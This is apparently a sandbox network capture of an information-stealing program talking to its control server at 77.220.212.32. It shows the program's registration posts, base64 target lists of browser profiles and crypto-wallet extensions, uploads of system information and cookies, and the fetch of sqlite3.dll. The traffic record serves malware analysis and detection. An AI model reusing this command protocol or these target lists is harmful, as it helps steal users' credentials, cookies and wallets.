Nov 9, 2024 02:47:08.535507917 CET	416	OUT	POST /eb51242cada87444.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHJDGHJDBFIJKECAECAF Host: 77.220.212.32 Content-Length: 216 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 30 42 30 42 45 30 38 43 44 30 37 34 31 37 30 30 36 36 32 33 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 2d 2d 0d 0a Data Ascii: ------EHJDGHJDBFIJKECAECAFContent-Disposition: form-data; name="hwid"10B0BE08CD07417006623------EHJDGHJDBFIJKECAECAFContent-Disposition: form-data; name="build"LogsDiller------EHJDGHJDBFIJKECAECAF--
Nov 9, 2024 02:47:08.860290051 CET	407	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:08 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4e 44 64 6d 4e 32 59 33 4d 6d 56 6b 5a 54 55 79 4e 6d 4d 77 59 6d 51 78 59 57 4a 6c 4d 54 6c 6b 4d 6a 67 7a 4f 47 55 33 59 54 41 32 4d 54 46 6a 4e 32 45 7a 59 57 55 35 4d 54 67 33 4e 32 55 32 5a 6a 6b 7a 59 7a 63 30 59 6a 42 6b 4e 7a 45 30 5a 44 59 7a 4d 7a 5a 69 4d 6d 4d 77 4f 47 59 7a 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 46 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: NDdmN2Y3MmVkZTUyNmMwYmQxYWJlMTlkMjgzOGU3YTA2MTFjN2EzYWU5MTg3N2U2ZjkzYzc0YjBkNzE0ZDYzMzZiMmMwOGYzfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDF8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Nov 9, 2024 02:47:08.862277985 CET	468	OUT	POST /eb51242cada87444.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKECFIEBGCAKJKECGCFI Host: 77.220.212.32 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 4b 45 43 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 66 37 66 37 32 65 64 65 35 32 36 63 30 62 64 31 61 62 65 31 39 64 32 38 33 38 65 37 61 30 36 31 31 63 37 61 33 61 65 39 31 38 37 37 65 36 66 39 33 63 37 34 62 30 64 37 31 34 64 36 33 33 36 62 32 63 30 38 66 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 4b 45 43 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 4b 45 43 47 43 46 49 2d 2d 0d 0a Data Ascii: ------KKECFIEBGCAKJKECGCFIContent-Disposition: form-data; name="token"47f7f72ede526c0bd1abe19d2838e7a0611c7a3ae91877e6f93c74b0d714d6336b2c08f3------KKECFIEBGCAKJKECGCFIContent-Disposition: form-data; name="message"browsers------KKECFIEBGCAKJKECGCFI--
Nov 9, 2024 02:47:09.102893114 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:08 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2064 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 58 45 64 76 62 32 64 73 5a 56 78 63 51 32 68 79 62 32 31 6c 58 46 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 63 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4d 48 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 57 31 70 5a 32 39 38 58 45 46 74 61 57 64 76 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcXFByb2dyYW0gRmlsZXNcXEdvb2dsZVxcQ2hyb21lXFxBcHBsaWNhdGlvblxcfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8MHxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8QW1pZ298XEFtaWdvXFVzZXIgRGF0YXxjaHJvbWV8MHwwfFRvcmNofFxUb3JjaFxVc2VyIERhdGF8Y2hyb21lfDB8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8JUxPQ0FMQVBQREFUQSVcXFZpdmFsZGlcXEFwcGxpY2F0aW9uXFx8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8MHxFcGljUHJpdmFjeUJyb3dzZXJ8XEVwaWMgUHJpdmFjeSBCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8ZXBpYy5leGV8JUxPQ0FMQVBQREFUQSVcXEVwaWMgUHJpdmFjeSBCcm93c2VyXFxBcHBsaWNhdGlvblxcfENvY0NvY3xcQ29jQ29jXEJyb3dzZXJcVXNlciBEYXRhfGNocm9tZXxicm93c2VyLmV4ZXxDOlxcUHJvZ3JhbSBGaWxlc1xcQ29jQ29jXFxCcm93c2VyXFxBcHBsaWNhdGlvblxcfEJyYXZlfFxCcmF2ZVNvZnR3YXJlXEJyYXZlLUJyb3dzZXJcVXNlciBEYXRhfGNocm9tZXxicmF2ZS5leGV8QzpcXFByb2dyYW0gRmlsZXNcXEJyYXZlU29mdHdhcmVcXEJyYXZlLUJyb3dz
Nov 9, 2024 02:47:09.102937937 CET	1056	IN	Data Raw: 5a 58 4a 63 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 46 78 38 51 32 56 75 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 Data Ascii: ZXJcXEFwcGxpY2F0aW9uXFx8Q2VudCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcXENlbnRCcm93c2VyXFxBcHBsaWNhdGlvblxcfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXI
Nov 9, 2024 02:47:09.223802090 CET	467	OUT	POST /eb51242cada87444.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAKJEGCFBGDHJJJJJKJE Host: 77.220.212.32 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 66 37 66 37 32 65 64 65 35 32 36 63 30 62 64 31 61 62 65 31 39 64 32 38 33 38 65 37 61 30 36 31 31 63 37 61 33 61 65 39 31 38 37 37 65 36 66 39 33 63 37 34 62 30 64 37 31 34 64 36 33 33 36 62 32 63 30 38 66 33 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 2d 2d 0d 0a Data Ascii: ------AAKJEGCFBGDHJJJJJKJEContent-Disposition: form-data; name="token"47f7f72ede526c0bd1abe19d2838e7a0611c7a3ae91877e6f93c74b0d714d6336b2c08f3------AAKJEGCFBGDHJJJJJKJEContent-Disposition: form-data; name="message"plugins------AAKJEGCFBGDHJJJJJKJE--
Nov 9, 2024 02:47:09.464664936 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:09 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Nov 9, 2024 02:47:09.464678049 CET	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Nov 9, 2024 02:47:09.464689970 CET	1236	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Nov 9, 2024 02:47:09.464812040 CET	1236	IN	Data Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48 Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
Nov 9, 2024 02:47:09.464824915 CET	848	IN	Data Raw: 59 57 5a 6a 61 48 77 78 66 44 42 38 4d 48 78 4e 57 55 74 4a 66 47 4a 74 61 57 74 77 5a 32 39 6b 63 47 74 6a 62 47 35 72 5a 32 31 75 63 48 42 6f 5a 57 68 6b 5a 32 4e 70 62 57 31 70 5a 47 56 6b 66 44 46 38 4d 48 77 77 66 46 4e 77 62 47 6c 72 61 58 Data Ascii: YWZjaHwxfDB8MHxNWUtJfGJtaWtwZ29kcGtjbG5rZ21ucHBoZWhkZ2NpbW1pZGVkfDF8MHwwfFNwbGlraXR5fGpoZmpmY2xlcGFjb2xkbWpta21kbG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2Z
Nov 9, 2024 02:47:09.464839935 CET	1236	IN	Data Raw: 62 6e 52 70 5a 58 49 67 56 32 46 73 62 47 56 30 66 47 74 77 63 47 5a 6b 61 57 6c 77 63 47 68 6d 59 32 4e 6c 62 57 4e 70 5a 32 35 6f 61 57 5a 77 61 6d 74 68 63 47 5a 69 61 57 68 6b 66 44 46 38 4d 48 77 77 66 46 4e 68 5a 6d 56 51 59 57 78 38 62 47 Data Ascii: bnRpZXIgV2FsbGV0fGtwcGZkaWlwcGhmY2NlbWNpZ25oaWZwamthcGZiaWhkfDF8MHwwfFNhZmVQYWx8bGdtcGNwZ2xwbmdkb2FsYmdlb2xkZWFqZmNsbmhhZmF8MXwwfDB8U3ViV2FsbGV0IC0gUG9sa2Fkb3QgV2FsbGV0fG9uaG9nZmplYWNuZm9vZmtmZ3BwZGxibWxtbnBsZ2JufDF8MHwwfEZsdXZpIFdhbGxldHxtbW1
Nov 9, 2024 02:47:09.464853048 CET	316	IN	Data Raw: 62 57 6c 6f 62 6d 52 74 62 57 4e 6b 59 57 35 68 59 32 39 73 62 6d 68 38 4d 58 77 77 66 44 42 38 51 6d 6c 30 5a 32 56 30 49 46 64 68 62 47 78 6c 64 48 78 71 61 57 6c 6b 61 57 46 68 62 47 6c 6f 62 57 31 6f 5a 47 52 71 5a 32 4a 75 59 6d 64 6b 5a 6d Data Ascii: bWlobmRtbWNkYW5hY29sbmh8MXwwfDB8Qml0Z2V0IFdhbGxldHxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHxUT04gV2FsbGV0fG5waHBscGdvYWtoaGpjaGtraG1pZ2dha2lqbmtoZm5kfDF8MHwwfE15VG9uV2FsbGV0fGZsZGZwZ2lwZm5jZ25kZm9sY2JrZGVla25iYmJuaGNjfDF8MHwwfFVuaXN
Nov 9, 2024 02:47:09.466551065 CET	468	OUT	POST /eb51242cada87444.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGDHDAFIDGDBGCAAFIDH Host: 77.220.212.32 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 47 44 48 44 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 66 37 66 37 32 65 64 65 35 32 36 63 30 62 64 31 61 62 65 31 39 64 32 38 33 38 65 37 61 30 36 31 31 63 37 61 33 61 65 39 31 38 37 37 65 36 66 39 33 63 37 34 62 30 64 37 31 34 64 36 33 33 36 62 32 63 30 38 66 33 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 48 44 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 48 44 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 2d 2d 0d 0a Data Ascii: ------BGDHDAFIDGDBGCAAFIDHContent-Disposition: form-data; name="token"47f7f72ede526c0bd1abe19d2838e7a0611c7a3ae91877e6f93c74b0d714d6336b2c08f3------BGDHDAFIDGDBGCAAFIDHContent-Disposition: form-data; name="message"fplugins------BGDHDAFIDGDBGCAAFIDH--
Nov 9, 2024 02:47:09.706866980 CET	335	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:09 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Nov 9, 2024 02:47:09.728300095 CET	201	OUT	POST /eb51242cada87444.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEBGIEGCFHCFHIDHIJEC Host: 77.220.212.32 Content-Length: 6683 Connection: Keep-Alive Cache-Control: no-cache
Nov 9, 2024 02:47:09.728378057 CET	6683	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 66 37 66 37 Data Ascii: ------AEBGIEGCFHCFHIDHIJECContent-Disposition: form-data; name="token"47f7f72ede526c0bd1abe19d2838e7a0611c7a3ae91877e6f93c74b0d714d6336b2c08f3------AEBGIEGCFHCFHIDHIJECContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Nov 9, 2024 02:47:10.383800030 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:09 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 9, 2024 02:47:10.614357948 CET	92	OUT	GET /241bc8c289ca83f4/sqlite3.dll HTTP/1.1 Host: 77.220.212.32 Cache-Control: no-cache
Nov 9, 2024 02:47:10.851300955 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:10 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT ETag: "10e436-5e7eeebed8d80" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Nov 9, 2024 02:47:10.851327896 CET	1236	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Nov 9, 2024 02:47:10.851344109 CET	424	IN	Data Raw: ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed c7 05 48 67 eb 61 ff ff ff ff 83 c4 1c 89 e8 5b 5e 5f 5d c3 8d b4 26 Data Ascii: tu.\|$\$4$\|$\$4$du1Hga[^_]&+C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49749	77.220.212.32	80	6396	C:\Users\user\Desktop\HrxOpVxK5d.exe

Timestamp	Bytes transferred	Direction	Data
Nov 9, 2024 02:47:21.096971989 CET	200	OUT	POST /eb51242cada87444.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKKKJJJKJKFHJJJJECBF Host: 77.220.212.32 Content-Length: 991 Connection: Keep-Alive Cache-Control: no-cache
Nov 9, 2024 02:47:21.096986055 CET	991	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 66 37 66 37 Data Ascii: ------JKKKJJJKJKFHJJJJECBFContent-Disposition: form-data; name="token"47f7f72ede526c0bd1abe19d2838e7a0611c7a3ae91877e6f93c74b0d714d6336b2c08f3------JKKKJJJKJKFHJJJJECBFContent-Disposition: form-data; name="file_name"Y29va2llc1xHb
Nov 9, 2024 02:47:22.295496941 CET	203	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
